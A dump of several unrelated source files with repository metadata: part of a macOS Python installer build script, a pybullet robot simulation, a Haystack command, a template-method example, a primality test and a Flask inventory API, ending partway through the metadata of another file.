LDVERSION=ln.split()[1]
fp.close()
LDVERSION = LDVERSION.replace('$(VERSION)', VERSION)
LDVERSION = LDVERSION.replace('$(ABIFLAGS)', ABIFLAGS)
config_suffix = '-' + LDVERSION
if getVersionMajorMinor() >= (3, 6):
config_suffix = config_suffix + '-darwin'
else:
config_suffix = '' # Python 2.x
# We added some directories to the search path during the configure
# phase. Remove those because those directories won't be there on
# the end-users system. Also remove the directories from _sysconfigdata.py
# (added in 3.3) if it exists.
include_path = '-I%s/libraries/usr/local/include' % (WORKDIR,)
lib_path = '-L%s/libraries/usr/local/lib' % (WORKDIR,)
# fix Makefile
path = os.path.join(path_to_lib, 'config' + config_suffix, 'Makefile')
fp = open(path, 'r')
data = fp.read()
fp.close()
for p in (include_path, lib_path):
data = data.replace(" " + p, '')
data = data.replace(p + " ", '')
fp = open(path, 'w')
fp.write(data)
fp.close()
# fix _sysconfigdata
#
# TODO: make this more robust! test_sysconfig_module of
# distutils.tests.test_sysconfig.SysconfigTestCase tests that
# the output from get_config_var in both sysconfig and
# distutils.sysconfig is exactly the same for both CFLAGS and
# LDFLAGS. The fixing up is now complicated by the pretty
# printing in _sysconfigdata.py. Also, we are using the
# pprint from the Python running the installer build which
# may not cosmetically format the same as the pprint in the Python
# being built (and which is used to originally generate
# _sysconfigdata.py).
import pprint
if getVersionMajorMinor() >= (3, 6):
# XXX this is extra-fragile
path = os.path.join(path_to_lib, '_sysconfigdata_m_darwin_darwin.py')
else:
path = os.path.join(path_to_lib, '_sysconfigdata.py')
fp = open(path, 'r')
data = fp.read()
fp.close()
# create build_time_vars dict
exec(data)
vars = {}
for k, v in build_time_vars.items():
if type(v) == type(''):
for p in (include_path, lib_path):
v = v.replace(' ' + p, '')
v = v.replace(p + ' ', '')
vars[k] = v
fp = open(path, 'w')
# duplicated from sysconfig._generate_posix_vars()
fp.write('# system configuration generated and used by'
' the sysconfig module\n')
fp.write('build_time_vars = ')
pprint.pprint(vars, stream=fp)
fp.close()
# Add symlinks in /usr/local/bin, using relative links
usr_local_bin = os.path.join(rootDir, 'usr', 'local', 'bin')
to_framework = os.path.join('..', '..', '..', 'Library', 'Frameworks',
'Python.framework', 'Versions', version, 'bin')
if os.path.exists(usr_local_bin):
shutil.rmtree(usr_local_bin)
os.makedirs(usr_local_bin)
for fn in os.listdir(
os.path.join(frmDir, 'Versions', version, 'bin')):
os.symlink(os.path.join(to_framework, fn),
os.path.join(usr_local_bin, fn))
os.chdir(curdir)
if PYTHON_3:
# Remove the 'Current' link, that way we don't accidentally mess
# with an already installed version of python 2
os.unlink(os.path.join(rootDir, 'Library', 'Frameworks',
'Python.framework', 'Versions', 'Current'))
def patchFile(inPath, outPath):
data = fileContents(inPath)
data = data.replace('$FULL_VERSION', getFullVersion())
data = data.replace('$VERSION', getVersion())
data = data.replace('$MACOSX_DEPLOYMENT_TARGET', ''.join((DEPTARGET, ' or later')))
data = data.replace('$ARCHITECTURES', ", ".join(universal_opts_map[UNIVERSALARCHS]))
data = data.replace('$INSTALL_SIZE', installSize())
data = data.replace('$THIRD_PARTY_LIBS', "\\\n".join(THIRD_PARTY_LIBS))
# This one is not handy as a template variable
data = data.replace('$PYTHONFRAMEWORKINSTALLDIR', '/Library/Frameworks/Python.framework')
fp = open(outPath, 'w')
fp.write(data)
fp.close()
def patchScript(inPath, outPath):
major, minor = getVersionMajorMinor()
data = fileContents(inPath)
data = data.replace('@PYMAJOR@', str(major))
data = data.replace('@PYVER@', getVersion())
fp = open(outPath, 'w')
fp.write(data)
fp.close()
os.chmod(outPath, STAT_0o755)
def packageFromRecipe(targetDir, recipe):
curdir = os.getcwd()
try:
# The major version (such as 2.5) is included in the package name
# because having two version of python installed at the same time is
# common.
pkgname = '%s-%s'%(recipe['name'], getVersion())
srcdir = recipe.get('source')
pkgroot = recipe.get('topdir', srcdir)
postflight = recipe.get('postflight')
readme = textwrap.dedent(recipe['readme'])
isRequired = recipe.get('required', True)
print("- building package %s"%(pkgname,))
# Substitute some variables
textvars = dict(
VER=getVersion(),
FULLVER=getFullVersion(),
)
readme = readme % textvars
if pkgroot is not None:
pkgroot = pkgroot % textvars
else:
pkgroot = '/'
if srcdir is not None:
srcdir = os.path.join(WORKDIR, '_root', srcdir[1:])
srcdir = srcdir % textvars
if postflight is not None:
postflight = os.path.abspath(postflight)
packageContents = os.path.join(targetDir, pkgname + '.pkg', 'Contents')
os.makedirs(packageContents)
if srcdir is not None:
os.chdir(srcdir)
runCommand("pax -wf %s . 2>&1"%(shellQuote(os.path.join(packageContents, 'Archive.pax')),))
runCommand("gzip -9 %s 2>&1"%(shellQuote(os.path.join(packageContents, 'Archive.pax')),))
runCommand("mkbom . %s 2>&1"%(shellQuote(os.path.join(packageContents, 'Archive.bom')),))
fn = os.path.join(packageContents, 'PkgInfo')
fp = open(fn, 'w')
fp.write('pmkrpkg1')
fp.close()
rsrcDir = os.path.join(packageContents, "Resources")
os.mkdir(rsrcDir)
fp = open(os.path.join(rsrcDir, 'ReadMe.txt'), 'w')
fp.write(readme)
fp.close()
if postflight is not None:
patchScript(postflight, os.path.join(rsrcDir, 'postflight'))
vers = getFullVersion()
major, minor = getVersionMajorMinor()
pl = Plist(
CFBundleGetInfoString="Python.%s %s"%(pkgname, vers,),
CFBundleIdentifier='org.python.Python.%s'%(pkgname,),
CFBundleName='Python.%s'%(pkgname,),
CFBundleShortVersionString=vers,
IFMajorVersion=major,
IFMinorVersion=minor,
IFPkgFormatVersion=0.10000000149011612,
IFPkgFlagAllowBackRev=False,
IFPkgFlagAuthorizationAction="RootAuthorization",
IFPkgFlagDefaultLocation=pkgroot,
IFPkgFlagFollowLinks=True,
IFPkgFlagInstallFat=True,
IFPkgFlagIsRequired=isRequired,
IFPkgFlagOverwritePermissions=False,
IFPkgFlagRelocatable=False,
IFPkgFlagRestartAction="NoRestart",
IFPkgFlagRootVolumeOnly=True,
IFPkgFlagUpdateInstalledLangauges=False,
)
writePlist(pl, os.path.join(packageContents, 'Info.plist'))
pl = Plist(
IFPkgDescriptionDescription=readme,
IFPkgDescriptionTitle=recipe.get('long_name', "Python.%s"%(pkgname,)),
IFPkgDescriptionVersion=vers,
)
writePlist(pl, os.path.join(packageContents, 'Resources', 'Description.plist'))
finally:
os.chdir(curdir)
def makeMpkgPlist(path):
vers = getFullVersion()
major, minor = getVersionMajorMinor()
pl = Plist(
CFBundleGetInfoString="Python %s"%(vers,),
CFBundleIdentifier='org.python.Python',
CFBundleName='Python',
CFBundleShortVersionString=vers,
IFMajorVersion=major,
IFMinorVersion=minor,
IFPkgFlagComponentDirectory="Contents/Packages",
IFPkgFlagPackageList=[
dict(
IFPkgFlagPackageLocation='%s-%s.pkg'%(item['name'], getVersion()),
IFPkgFlagPackageSelection=item.get('selected', 'selected'),
)
for item in pkg_recipes()
],
IFPkgFormatVersion=0.10000000149011612,
IFPkgFlagBackgroundScaling="proportional",
IFPkgFlagBackgroundAlignment="left",
IFPkgFlagAuthorizationAction="RootAuthorization",
)
writePlist(pl, path)
def buildInstaller():
# Zap all compiled files
for dirpath, _, filenames in os.walk(os.path.join(WORKDIR, '_root')):
for fn in filenames:
if fn.endswith('.pyc') or fn.endswith('.pyo'):
os.unlink(os.path.join(dirpath, fn))
outdir = os.path.join(WORKDIR, 'installer')
if os.path.exists(outdir):
shutil.rmtree(outdir)
os.mkdir(outdir)
pkgroot = os.path.join(outdir, 'Python.mpkg', 'Contents')
pkgcontents = os.path.join(pkgroot, 'Packages')
os.makedirs(pkgcontents)
for recipe in pkg_recipes():
packageFromRecipe(pkgcontents, recipe)
rsrcDir = os.path.join(pkgroot, 'Resources')
fn = os.path.join(pkgroot, 'PkgInfo')
fp = open(fn, 'w')
fp.write('pmkrpkg1')
fp.close()
os.mkdir(rsrcDir)
makeMpkgPlist(os.path.join(pkgroot, 'Info.plist'))
pl = Plist(
IFPkgDescriptionTitle="Python",
IFPkgDescriptionVersion=getVersion(),
)
writePlist(pl, os.path.join(pkgroot, 'Resources', 'Description.plist'))
for fn in os.listdir('resources'):
if fn == '.svn': continue
if fn.endswith('.jpg'):
shutil.copy(os.path.join('resources', fn), os.path.join(rsrcDir, fn))
else:
patchFile(os.path.join('resources', fn), os.path.join(rsrcDir, fn))
def installSize(clear=False, _saved=[]):
if clear:
del _saved[:]
if not _saved:
data = captureCommand("du -ks %s"%(
shellQuote(os.path.join(WORKDIR, '_root'))))
_saved.append("%d"%((0.5 + (int(data.split()[0]) / 1024.0)),))
return _saved[0]
def buildDMG():
"""
Create DMG containing the rootDir.
"""
outdir = os.path.join(WORKDIR, 'diskimage')
if os.path.exists(outdir):
shutil.rmtree(outdir)
imagepath = os.path.join(outdir,
'python-%s-macosx%s'%(getFullVersion(),DEPTARGET))
if INCLUDE_TIMESTAMP:
imagepath = imagepath + '-%04d-%02d-%02d'%(time.localtime()[:3])
imagepath = imagepath + '.dmg'
os.mkdir(outdir)
# Try to mitigate race condition in certain versions of macOS, e.g. 10.9,
# when hdiutil create fails with "Resource busy". For now, just retry
# the create a few times and hope that it eventually works.
volname='Python %s'%(getFullVersion())
cmd = ("hdiutil create -format UDRW -volname %s -srcfolder %s -size 100m %s"%(
shellQuote(volname),
shellQuote(os.path.join(WORKDIR, 'installer')),
shellQuote(imagepath + ".tmp.dmg" )))
for i in range(5):
fd = os.popen(cmd, 'r')
data = fd.read()
xit = fd.close()
if not xit:
break
sys.stdout.write(data)
print(" -- retrying hdiutil create")
time.sleep(5)
else:
raise RuntimeError("command failed: %s"%(cmd,))
if not os.path.exists(os.path.join(WORKDIR, "mnt")):
os.mkdir(os.path.join(WORKDIR, "mnt"))
runCommand("hdiutil attach %s -mountroot %s"%(
shellQuote(imagepath + ".tmp.dmg"), shellQuote(os.path.join(WORKDIR, "mnt"))))
# Custom icon for the DMG, shown when the DMG is mounted.
shutil.copy("../Icons/Disk Image.icns",
os.path.join(WORKDIR, "mnt", volname, ".VolumeIcon.icns"))
runCommand("SetFile -a C %s/"%(
shellQuote(os.path.join(WORKDIR, "mnt", volname)),))
runCommand("hdiutil detach %s"%(shellQuote(os.path.join(WORKDIR, "mnt", volname))))
setIcon(imagepath + ".tmp.dmg", "../Icons/Disk Image.icns")
runCommand("hdiutil convert %s -format UDZO -o %s"%(
shellQuote(imagepath + ".tmp.dmg"), shellQuote(imagepath)))
setIcon(imagepath, "../Icons/Disk Image.icns")
os.unlink(imagepath + ".tmp.dmg")
return imagepath
def setIcon(filePath, icnsPath):
"""
Set the custom icon for the specified file or directory.
"""
dirPath = os.path.normpath(os.path.dirname(__file__))
toolPath = os.path.join(dirPath, "seticon.app/Contents/MacOS/seticon")
if not os.path.exists(toolPath) or os.stat(toolPath).st_mtime < os.stat(dirPath + '/seticon.m').st_mtime:
# NOTE: The tool is created inside an .app bundle, otherwise it won't work due
# to connections to the window server.
appPath = os.path.join(dirPath, "seticon.app/Contents/MacOS")
if not os.path.exists(appPath):
os.makedirs(appPath)
runCommand("cc -o %s %s/seticon.m -framework Cocoa"%(
shellQuote(toolPath), shellQuote(dirPath)))
runCommand("%s %s %s"%(shellQuote(os.path.abspath(toolPath)), shellQuote(icnsPath),
shellQuote(filePath)))
def main():
# First parse options and check if we can perform our work
parseOptions()
checkEnvironment()
os.environ['MACOSX_DEPLOYMENT_TARGET'] = DEPTARGET
os.environ['CC'] = CC
os.environ['CXX'] = CXX
if os.path.exists(WORKDIR):
shutil.rmtree(WORKDIR)
os.mkdir(WORKDIR)
os.environ['LC_ALL'] = 'C'
# Then build third-party libraries such as sleepycat DB4.
buildLibraries()
# Now build python itself
buildPython()
# And then build the documentation
# Remove the Deployment Target from the shell
# environment, it's no longer needed and
# an unexpected build target can cause problems
# when Sphinx and its dependencies need to
# be (re-)installed.
del os.environ['MACOSX_DEPLOYMENT_TARGET']
buildPythonDocs()
# Prepare the applications folder
folder = os.path.join(WORKDIR, "_root", "Applications", "Python %s"%(
getVersion(),))
fn = os.path.join(folder, "License.rtf")
patchFile("resources/License.rtf", fn)
fn = os.path.join(folder, "ReadMe.rtf")
patchFile("resources/ReadMe.rtf", fn)
fn = os.path.join(folder, "Update Shell Profile.command")
patchScript("scripts/postflight.patch-profile", fn)
fn = os.path.join(folder, "Install Certificates.command")
patchScript("resources/install_certificates.command", fn)
os.chmod(folder, STAT_0o755)
setIcon(folder, "../Icons/Python Folder.icns")
# Create the installer
buildInstaller()
# And copy the readme into the directory containing the installer
patchFile('resources/ReadMe.rtf',
os.path.join(WORKDIR, 'installer', 'ReadMe.rtf'))
# Ditto for the license file.
patchFile('resources/License.rtf',
os.path.join(WORKDIR, 'installer', 'License.rtf'))
fp = open(os.path.join(WORKDIR, 'installer', 'Build.txt'), 'w')
fp.write("# BUILD INFO\n")
fp.write("# Date: %s\n" % time.ctime())
fp.write("# By: %s\n" % pwd.getpwuid(os.getuid()).pw_gecos)
fp.close()
# And copy it to a DMG
buildDMG()
if __name__ == "__main__":
main()
| 37.034793
| 174
| 0.581045
|
c0276c450710abc832fffa6bddf328f70fd648e6
| 9,330
|
py
|
Python
|
simulator/pybullet/fixed_draco_main.py
|
junhyeokahn/PnC
|
388440f7db7b2aedf1e397d0130d806090865c35
|
[
"MIT"
] | 25
|
2019-01-31T13:51:34.000Z
|
2022-02-08T13:19:01.000Z
|
simulator/pybullet/fixed_draco_main.py
|
junhyeokahn/PnC
|
388440f7db7b2aedf1e397d0130d806090865c35
|
[
"MIT"
] | 5
|
2020-06-01T20:48:46.000Z
|
2022-02-08T11:42:02.000Z
|
simulator/pybullet/fixed_draco_main.py
|
junhyeokahn/PnC
|
388440f7db7b2aedf1e397d0130d806090865c35
|
[
"MIT"
] | 9
|
2018-11-20T22:37:50.000Z
|
2021-09-14T17:17:27.000Z
|
import os
import sys
cwd = os.getcwd()
sys.path.append(cwd)
sys.path.append(cwd + '/utils/python_utils')
sys.path.append(cwd + '/simulator/pybullet')
sys.path.append(cwd + '/build/lib')
import time, math
from collections import OrderedDict
import copy
import signal
import shutil
import cv2
import pybullet as p
import numpy as np
np.set_printoptions(precision=2)
from config.fixed_draco.pybullet_simulation import Config
import pybullet_util
import util
import fixed_draco_interface
def set_initial_config(robot, joint_id):
# Upperbody
p.resetJointState(robot, joint_id["l_shoulder_aa"], np.pi / 6, 0.)
p.resetJointState(robot, joint_id["l_elbow_fe"], -np.pi / 2, 0.)
p.resetJointState(robot, joint_id["r_shoulder_aa"], -np.pi / 6, 0.)
p.resetJointState(robot, joint_id["r_elbow_fe"], -np.pi / 2, 0.)
# p.resetJointState(robot, joint_id["l_wrist_ps"], np.pi / 6, 0.)
# p.resetJointState(robot, joint_id["r_wrist_ps"], -np.pi / 6, 0.)
# Lowerbody
hip_yaw_angle = 5
p.resetJointState(robot, joint_id["l_hip_aa"], np.radians(hip_yaw_angle),
0.)
p.resetJointState(robot, joint_id["l_hip_fe"], -np.pi / 4, 0.)
p.resetJointState(robot, joint_id["l_knee_fe_jp"], np.pi / 4, 0.)
p.resetJointState(robot, joint_id["l_knee_fe_jd"], np.pi / 4, 0.)
p.resetJointState(robot, joint_id["l_ankle_fe"], -np.pi / 4, 0.)
p.resetJointState(robot, joint_id["l_ankle_ie"],
np.radians(-hip_yaw_angle), 0.)
p.resetJointState(robot, joint_id["r_hip_aa"], np.radians(-hip_yaw_angle),
0.)
p.resetJointState(robot, joint_id["r_hip_fe"], -np.pi / 4, 0.)
p.resetJointState(robot, joint_id["r_knee_fe_jp"], np.pi / 4, 0.)
p.resetJointState(robot, joint_id["r_knee_fe_jd"], np.pi / 4, 0.)
p.resetJointState(robot, joint_id["r_ankle_fe"], -np.pi / 4, 0.)
p.resetJointState(robot, joint_id["r_ankle_ie"], np.radians(hip_yaw_angle),
0.)
def signal_handler(signal, frame):
if Config.VIDEO_RECORD:
pybullet_util.make_video(video_dir, False)
p.disconnect()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
if __name__ == "__main__":
# Environment Setup
p.connect(p.GUI)
p.resetDebugVisualizerCamera(cameraDistance=1.0,
cameraYaw=120,
cameraPitch=-30,
cameraTargetPosition=[1, 0.5, -0.1])
p.setGravity(0, 0, -9.8)
p.setPhysicsEngineParameter(fixedTimeStep=Config.CONTROLLER_DT,
numSubSteps=Config.N_SUBSTEP)
if Config.VIDEO_RECORD:
video_dir = 'video/draco'
if os.path.exists(video_dir):
shutil.rmtree(video_dir)
os.makedirs(video_dir)
# Create Robot, Ground
p.configureDebugVisualizer(p.COV_ENABLE_RENDERING, 0)
robot = p.loadURDF(cwd + "/robot_model/draco/draco.urdf",
Config.INITIAL_POS_WORLD_TO_BASEJOINT,
Config.INITIAL_QUAT_WORLD_TO_BASEJOINT,
useFixedBase=1)
p.configureDebugVisualizer(p.COV_ENABLE_RENDERING, 1)
nq, nv, na, joint_id, link_id, pos_basejoint_to_basecom, rot_basejoint_to_basecom = pybullet_util.get_robot_config(
robot, Config.INITIAL_POS_WORLD_TO_BASEJOINT,
Config.INITIAL_QUAT_WORLD_TO_BASEJOINT, Config.PRINT_ROBOT_INFO)
# Add Gear constraint
c = p.createConstraint(robot,
link_id['l_knee_fe_lp'],
robot,
link_id['l_knee_fe_ld'],
jointType=p.JOINT_GEAR,
jointAxis=[0, 1, 0],
parentFramePosition=[0, 0, 0],
childFramePosition=[0, 0, 0])
p.changeConstraint(c, gearRatio=-1, maxForce=500, erp=2)
c = p.createConstraint(robot,
link_id['r_knee_fe_lp'],
robot,
link_id['r_knee_fe_ld'],
jointType=p.JOINT_GEAR,
jointAxis=[0, 1, 0],
parentFramePosition=[0, 0, 0],
childFramePosition=[0, 0, 0])
p.changeConstraint(c, gearRatio=-1, maxForce=500, erp=2)
# Initial Config
set_initial_config(robot, joint_id)
# Link Damping
pybullet_util.set_link_damping(robot, link_id.values(), 0., 0.)
# Joint Friction
pybullet_util.set_joint_friction(robot, joint_id, 0.5)
# Construct Interface
interface = fixed_draco_interface.FixedDracoInterface(False)
# interface = fixed_draco_interface.FixedDracoInterface(True)
sensor_data = fixed_draco_interface.FixedDracoSensorData()
command = fixed_draco_interface.FixedDracoCommand()
# Run Sim
t = 0
dt = Config.CONTROLLER_DT
count = 0
jpg_count = 0
nominal_sensor_data = pybullet_util.get_sensor_data(
robot, joint_id, link_id, pos_basejoint_to_basecom,
rot_basejoint_to_basecom)
while (1):
# Get SensorData
if Config.SIMULATE_CAMERA and count % (Config.CAMERA_DT /
Config.CONTROLLER_DT) == 0:
pass
sensor_data_dict = pybullet_util.get_sensor_data(
robot, joint_id, link_id, pos_basejoint_to_basecom,
rot_basejoint_to_basecom)
rf_height = pybullet_util.get_link_iso(robot,
link_id['r_foot_contact'])[2, 3]
lf_height = pybullet_util.get_link_iso(robot,
link_id['l_foot_contact'])[2, 3]
sensor_data_dict[
'b_rf_contact'] = True if rf_height <= 0.005 else False
sensor_data_dict[
'b_lf_contact'] = True if lf_height <= 0.005 else False
sensor_data_dict['imu_frame_iso'] = pybullet_util.get_link_iso(
robot, link_id['torso_imu'])
sensor_data_dict['imu_frame_vel'] = pybullet_util.get_link_vel(
robot, link_id['torso_imu'])
# Get Keyboard Event
keys = p.getKeyboardEvents()
if pybullet_util.is_key_triggered(keys, 'w'):
interface.interrupt.b_interrupt_button_w = True
elif pybullet_util.is_key_triggered(keys, 'x'):
interface.interrupt.b_interrupt_button_x = True
elif pybullet_util.is_key_triggered(keys, 'a'):
interface.interrupt.b_interrupt_button_a = True
elif pybullet_util.is_key_triggered(keys, 's'):
interface.interrupt.b_interrupt_button_s = True
elif pybullet_util.is_key_triggered(keys, 'd'):
interface.interrupt.b_interrupt_button_d = True
elif pybullet_util.is_key_triggered(keys, 'q'):
interface.interrupt.b_interrupt_button_q = True
elif pybullet_util.is_key_triggered(keys, 'e'):
interface.interrupt.b_interrupt_button_e = True
elif pybullet_util.is_key_triggered(keys, 'r'):
interface.interrupt.b_interrupt_button_r = True
# Copy sensor_data_dict
sensor_data.imu_frame_iso = sensor_data_dict['imu_frame_iso']
sensor_data.imu_frame_vel = sensor_data_dict['imu_frame_vel']
sensor_data.joint_positions = sensor_data_dict["joint_pos"]
sensor_data.joint_velocities = sensor_data_dict["joint_vel"]
# Compute Command
if Config.PRINT_TIME:
start_time = time.time()
interface.getCommand(sensor_data, command)
command_joint_positions = copy.deepcopy(command.joint_positions)
command_joint_velocities = copy.deepcopy(command.joint_velocities)
command_joint_torques = copy.deepcopy(command.joint_torques)
if Config.PRINT_TIME:
end_time = time.time()
print("ctrl computation time: ", end_time - start_time)
# Exclude Knee Proximal Joints Command
del command_joint_positions["l_knee_fe_jp"]
del command_joint_positions["r_knee_fe_jp"]
del command_joint_velocities["l_knee_fe_jp"]
del command_joint_velocities["r_knee_fe_jp"]
del command_joint_torques["l_knee_fe_jp"]
del command_joint_torques["r_knee_fe_jp"]
command_dict = dict()
command_dict["joint_pos"] = command_joint_positions
command_dict["joint_vel"] = command_joint_velocities
command_dict["joint_trq"] = command_joint_torques
# Apply Command
# pybullet_util.set_motor_trq(robot, joint_id, command_joint_torques)
pybullet_util.set_motor_impedance(robot, joint_id, command_dict,
Config.KP, Config.KD)
# Save Image
if (Config.VIDEO_RECORD) and (count % Config.RECORD_FREQ == 0):
frame = pybullet_util.get_camera_image([1., 0.5, 1.], 1.0, 120,
-15, 0, 60., 1920, 1080,
0.1, 100.)
frame = frame[:, :, [2, 1, 0]] # << RGB to BGR
filename = video_dir + '/step%06d.jpg' % jpg_count
cv2.imwrite(filename, frame)
jpg_count += 1
p.stepSimulation()
time.sleep(dt)
t += dt
count += 1
| 39.201681
| 119
| 0.622186
|
7746af5020e668189dbc4f76965c292197ec117f
| 753
|
py
|
Python
|
haystack/management/commands/haystack_info.py
|
dulmandakh/django-haystack
|
01c440618a63fa03e05ce9f4d2615e0933f642b1
|
[
"BSD-3-Clause"
] | null | null | null |
haystack/management/commands/haystack_info.py
|
dulmandakh/django-haystack
|
01c440618a63fa03e05ce9f4d2615e0933f642b1
|
[
"BSD-3-Clause"
] | null | null | null |
haystack/management/commands/haystack_info.py
|
dulmandakh/django-haystack
|
01c440618a63fa03e05ce9f4d2615e0933f642b1
|
[
"BSD-3-Clause"
] | null | null | null |
from django.core.management.base import BaseCommand
from haystack import connections
from haystack.constants import DEFAULT_ALIAS
class Command(BaseCommand):
help = "Provides feedback about the current Haystack setup."
def handle(self, **options):
"""Provides feedback about the current Haystack setup."""
unified_index = connections[DEFAULT_ALIAS].get_unified_index()
indexed = unified_index.get_indexed_models()
index_count = len(indexed)
self.stdout.write("Number of handled %s index(es)." % index_count)
for index in indexed:
self.stdout.write(
" - Model: %s by Index: %s"
% (index.__name__, unified_index.get_indexes()[index])
)
| 32.73913
| 74
| 0.662683
|
50d78e7d689e0e4b48a85a1310baab3829ea90b9
| 2,406
|
py
|
Python
|
behavioral/template_method.py
|
MADTeacher/design-patterns
|
8cac737a923f3e3dbfd4c5f38f95eeb74b0ca020
|
[
"MIT"
] | 11
|
2021-07-23T10:10:25.000Z
|
2022-02-09T08:54:16.000Z
|
behavioral/template_method.py
|
MADTeacher/design-patterns
|
8cac737a923f3e3dbfd4c5f38f95eeb74b0ca020
|
[
"MIT"
] | null | null | null |
behavioral/template_method.py
|
MADTeacher/design-patterns
|
8cac737a923f3e3dbfd4c5f38f95eeb74b0ca020
|
[
"MIT"
] | 8
|
2021-03-26T17:57:15.000Z
|
2022-01-03T13:23:42.000Z
|
from abc import ABC, abstractmethod
from typing import List
class Pizza:
"""Класс приготовляемой шеф-поваром пиццы"""
def __init__(self):
self.__state: List[str] = ['base']
def add_ingredient(self, ingredient: str) -> None:
print(f"В пиццу добавлен ингредиент: {ingredient}")
self.__state.append(ingredient)
def __str__(self):
return f"Ингридиенты пиццы: {self.__state}"
class PizzaMaker(ABC):
"""Базовый класс шаблонного метода"""
def make_pizza(self, pizza: Pizza) -> None:
self.prepare_sauce(pizza)
self.prepare_topping(pizza)
self.cook(pizza)
@abstractmethod
def prepare_sauce(self, pizza: Pizza) -> None:
...
@abstractmethod
def prepare_topping(self, pizza: Pizza) -> None:
...
@abstractmethod
def cook(self, pizza: Pizza) -> None:
...
class MargaritaMaker(PizzaMaker):
"""Класс приготовления пиццы Маргарита"""
def prepare_sauce(self, pizza: Pizza) -> None:
pizza.add_ingredient('Tomato')
def prepare_topping(self, pizza: Pizza) -> None:
pizza.add_ingredient('Bacon')
pizza.add_ingredient('Mozzarella')
pizza.add_ingredient('Mozzarella')
def cook(self, pizza: Pizza) -> None:
print("Пицца 'Маргарита' будет готова через 10 минут")
class SalamiMaker(PizzaMaker):
"""Класс приготовления пиццы Маргарита"""
def prepare_sauce(self, pizza: Pizza) -> None:
pizza.add_ingredient('Pesto')
def prepare_topping(self, pizza: Pizza) -> None:
pizza.add_ingredient('Salami')
pizza.add_ingredient('Salami')
pizza.add_ingredient('Mozzarella')
def cook(self, pizza: Pizza) -> None:
print("Пицца 'Салями' будет готова через 15 минут")
class Chief:
"""Класс шеф-повара"""
def __init__(self, template_pizza: PizzaMaker):
self.__cook = template_pizza
def set_cook_template(self, template_pizza: PizzaMaker):
self.__cook = template_pizza
def make_pizza(self) -> Pizza:
pizza = Pizza()
self.__cook.make_pizza(pizza)
return pizza
if __name__ == "__main__":
chief = Chief(MargaritaMaker())
print("*"*8 + "Готовим пиццу 'Маргарита'"+8*"*")
print(chief.make_pizza())
print("*" * 8 + "Готовим пиццу 'Салями'" + 8 * "*")
chief.set_cook_template(SalamiMaker())
print(chief.make_pizza())
| 27.655172
| 62
| 0.645054
|
0f8769abbefea0c538bf89f2c6369586e11f0cd8
| 831
|
py
|
Python
|
atcoder/abc/abc149_c.py
|
knuu/competitive-programming
|
16bc68fdaedd6f96ae24310d697585ca8836ab6e
|
[
"MIT"
] | 1
|
2018-11-12T15:18:55.000Z
|
2018-11-12T15:18:55.000Z
|
atcoder/abc/abc149_c.py
|
knuu/competitive-programming
|
16bc68fdaedd6f96ae24310d697585ca8836ab6e
|
[
"MIT"
] | null | null | null |
atcoder/abc/abc149_c.py
|
knuu/competitive-programming
|
16bc68fdaedd6f96ae24310d697585ca8836ab6e
|
[
"MIT"
] | null | null | null |
def miller_rabin(n):
""" primality Test
if n < 3,825,123,056,546,413,051, it is enough to test
a = 2, 3, 5, 7, 11, 13, 17, 19, and 23.
Complexity: O(log^3 n)
"""
assert(n >= 1)
if n == 2:
return True
if n <= 1 or not n & 1:
return False
primes = [2, 3, 5, 7, 11, 13, 17, 19, 23]
d = n - 1
s = 0
while not d & 1:
d >>= 1
s += 1
for prime in primes:
if prime >= n:
continue
x = pow(prime, d, n)
if x == 1:
continue
for r in range(s):
if x == n - 1:
break
if r + 1 == s:
return False
x = x * x % n
return True
X = int(input())
while True:
if miller_rabin(X):
print(X)
break
X += 1
| 19.785714
| 62
| 0.405535
|
41c22598cef5606219069802493372d21e4e826a
| 2,876
|
py
|
Python
|
python/tron.py
|
newrelic-experimental/demo-pythontron
|
0561d7e496da3a518c28102010c3c76445a47307
|
[
"Apache-2.0"
] | null | null | null |
python/tron.py
|
newrelic-experimental/demo-pythontron
|
0561d7e496da3a518c28102010c3c76445a47307
|
[
"Apache-2.0"
] | null | null | null |
python/tron.py
|
newrelic-experimental/demo-pythontron
|
0561d7e496da3a518c28102010c3c76445a47307
|
[
"Apache-2.0"
] | null | null | null |
import os
import sys
from flask import Flask, Response
from api.help import help_message
from dependency_injection_container import Container
from lib.app_logging import AppLogging
from lib.tron_response import TronResponse
from repository.helpers import inventory_repository_selector
app = Flask(__name__)
@app.errorhandler(Exception)
def handle_exception(e):
message = "{}".format(e)
AppLogging.error(message)
return message, 500
@app.route("/")
def index():
return get_flask_response(index.index_message())
@app.route("/api")
def index_api():
return get_flask_response(index.index_message())
@app.route("/api/help")
def help():
return get_flask_response(help_message())
@app.route("/api/behaviors")
def behaviors():
return get_flask_response(behaviors.list_behaviors())
@app.route("/api/validateMessage")
def validateMessage():
return get_flask_response(message.validate())
@app.route("/api/inventory")
def inventory_list():
return get_flask_response(inventory.get_inventory())
@app.route("/api/inventory/<string:item_id>")
def inventory_item(item_id):
return get_flask_response(inventory.get_inventory_item(item_id))
@app.route("/api/database/health")
def database_health_check():
is_connected = database_connector.connect().is_connected()
status_code = 200 if is_connected else 500
return get_flask_response(TronResponse(status_code=status_code))
@app.after_request
def add_headers(response):
return http_utils.add_response_headers(response)
def get_flask_response(tron_response):
response = Response(
tron_response.get_body(),
status=tron_response.get_status_code(),
mimetype='application/json'
)
for k, v in tron_response.get_headers().items():
response.headers[k] = v
return response
if __name__ == "__main__":
container = Container()
app_config = container.app_config()
container.config.from_dict(app_config.asdict())
container.wire(modules=[sys.modules[__name__]])
arguments = container.arguments()
AppLogging.init(arguments.logging_level)
if inventory_repository_selector(app_config) == 'database':
container.setup_database_action().execute()
database_connector = container.database_connector()
http_utils = container.http_utils()
inventory = container.inventory_handler()
message = container.message_handler()
behaviors = container.behaviors_handler()
index = container.index_handler()
debug_mode = arguments.debug_mode
if debug_mode is not None and debug_mode == 'On':
os.environ["FLASK_ENV"] = "development"
port = int(app_config.get_app_port())
AppLogging.info("Listening on port: " + str(port))
AppLogging.info(index.get_message())
app.run(use_debugger=True, use_reloader=False, threaded=True, host='0.0.0.0', port=port)
| 25.678571
| 92
| 0.73783
|
1fff79c7c297ddae3bbff2a59c09186fc49b4ada
| 11,710
|
py
|
Python
|
ces/coin_database.py
|
coincell-pub/CLI-crypto-console
|
30c2d2c64e14d0cfa54aafd0cabb7d1524cd5d56
|
[
"BSD-2-Clause",
"BSD-2-Clause-FreeBSD"
] | null | null | null |
ces/coin_database.py
|
coincell-pub/CLI-crypto-console
|
30c2d2c64e14d0cfa54aafd0cabb7d1524cd5d56
|
[
"BSD-2-Clause",
